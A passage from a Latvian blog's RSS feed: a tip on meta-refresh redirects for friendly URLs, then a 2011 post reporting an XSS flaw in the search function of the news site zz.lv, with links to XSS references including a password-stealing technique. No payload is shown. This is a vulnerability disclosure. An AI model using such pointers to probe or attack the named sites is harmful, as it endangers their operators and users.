			<content:encoded><![CDATA[<p>Ir elegants veids kā izveidot lietotājam draudzīgu url pat gadījumā, ja mājas lapas CRM to nepieļauj un nav iespējams veikt izmaiņas servera konfigurācijā (uzstādīt server side redirection ar .htaccess vai .config).<br />
Piemēram, ja ir lapa, kura neuztur lietotājam draudzīgus url- http://kautkas.lv/?i=3 un ir nepieciešams, lai adrese izskatītos- http://kautkas.lv/atrodi-sevi/<br />
Tad to var izdarīt izveidojot direktoriju atrodi-sevi un tajā ievietojot failu index.php ar saturu:<br />
&lt;blockquote>&lt;code><br />
&lt;HTML><br />
&lt;HEAD><br />
&lt;META HTTP-EQUIV=&#8221;refresh&#8221; CONTENT=&#8221;0;URL=http://kautkas.lv/?i=3&#8243;><br />
&lt;/HEAD><br />
&lt;BODY><br />
&lt;/BODY><br />
&lt;/HTML>&lt;/code> &lt;/blockquote></p>
<p>Jāatceras, ka šāda adrese ir tikai lietotājiem draudzīga, nevis meklētājiem.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/html-redirect' rel='bookmark' title='HTML REDIRECT SEO'>HTML REDIRECT SEO</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/user-friendly-url/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>www.zz.lv un XSS</title>
		<link>http://dll.lv/www-zz-lv-un-xss?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=www-zz-lv-un-xss</link>
		<comments>http://dll.lv/www-zz-lv-un-xss#comments</comments>
		<pubDate>Mon, 17 Jan 2011 07:00:51 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[easy hack]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[kodējam]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[zz.lv]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1427</guid>
		<description><![CDATA[Mājās drusku pabakstoties atklājās, ka Zemgales ziņas mājas lapas meklēšanas funkcionalitātē ir XSS ievainojamība. Pieņemu, ka tāda pati problēma ir visās AS Dienas reģionālo avīžu mājas lapās. Pilnībā atvēzēties liedz tas, ka tiek atfiltrēts „=” simbols. Par XSS var palasīt: &#8230; <a href="http://dll.lv/www-zz-lv-un-xss">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
<li><a href='http://dll.lv/uzlauzts-chrysler-lv' rel='bookmark' title='Uzlauzts Chrysler.lv'>Uzlauzts Chrysler.lv</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Mājās drusku pabakstoties atklājās, ka <a href="http://zz.lv" target="_blank">Zemgales ziņas</a> mājas lapas meklēšanas funkcionalitātē ir XSS ievainojamība. Pieņemu, ka tāda pati problēma ir visās AS Dienas reģionālo avīžu mājas lapās.<br />
Pilnībā atvēzēties liedz tas, ka tiek atfiltrēts „=” simbols.<br />
Par XSS var palasīt:</p>
<p><a href="http://hakipedia.com/index.php/Cross_Site_Scripting" target="_blank">http://hakipedia.com/index.php/Cross_Site_Scripting</a><br />
<a href="http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" target="_blank"> http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</a><br />
<a href="http://ha.ckers.org/xss.html" target="_blank"> http://ha.ckers.org/xss.html</a><br />
<a href="http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html" target="_blank"> http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html</a><br />
<a href="http://dll.lv/wp-content/uploads/2011/01/zz_lv.png"><img class="aligncenter size-medium wp-image-1428" title="zz_lv" src="http://dll.lv/wp-content/uploads/2011/01/zz_lv-300x225.png" alt="" width="300" height="225" /></a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
<li><a href='http://dll.lv/uzlauzts-chrysler-lv' rel='bookmark' title='Uzlauzts Chrysler.lv'>Uzlauzts Chrysler.lv</a></li>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/www-zz-lv-un-xss/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

